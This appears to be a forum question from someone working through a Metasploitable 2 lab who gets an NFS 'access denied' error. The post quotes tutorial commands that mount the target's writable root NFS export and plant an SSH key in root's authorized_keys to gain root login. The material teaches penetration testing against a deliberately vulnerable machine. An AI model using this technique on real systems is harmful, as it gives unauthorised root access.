# mount.nfs: access denied by server while mounting <IP>:/

Tags: mount

I am working on a metasploitable 2 tutorial: [Rapid7 Mestasploit Tutorial Link](https://community.rapid7.com/docs/DOC-1875)

I am attempting to perform the following actions:

> Getting access to a system with a writeable filesystem like this is trivial. To do so (and because SSH is running), we will generate a new SSH key on our attacking system, mount the NFS export, and add our key to the root user account's `authorized_keys` file:
>
> ```
> root@ubuntu:~# ssh-keygen
> Generating public/private rsa key pair.
> Enter file in which to save the key (/root/.ssh/id_rsa):
> Enter passphrase (empty for no passphrase):
> Enter same passphrase again:
> Your identification has been saved in /root/.ssh/id_rsa.
> Your public key has been saved in /root/.ssh/id_rsa.pub.
>
> root@ubuntu:~# mkdir /tmp/r00t
> root@ubuntu:~# mount -t nfs 192.168.99.131:/ /tmp/r00t/
> root@ubuntu:~# cat ~/.ssh/id_rsa.pub >> /tmp/r00t/root/.ssh/authorized_keys
> root@ubuntu:~# umount /tmp/r00t
>
> root@ubuntu:~# ssh root@192.168.99.131
> Last login: Fri Jun  1 00:29:33 2012 from 192.168.99.128
> Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
>
> root@metasploitable:~#
> ```

When I get to the following command: `mount -t nfs 192.168.99.131:/ /tmp/r00t/`

I get the following error:

```
mount.nfs: access denied by server while mounting <IP>:/
```

Any help would be appreciated.

Comment: it sounds like the remote machine is not exporting its root filesystem "like it should be" for the lab. What's the output of "showmount -e 192.168.99.131" ?

Comment: Evening Jeff.  
showmount -e 192.168.99.131
Export list for 192.168.99.131:
/ *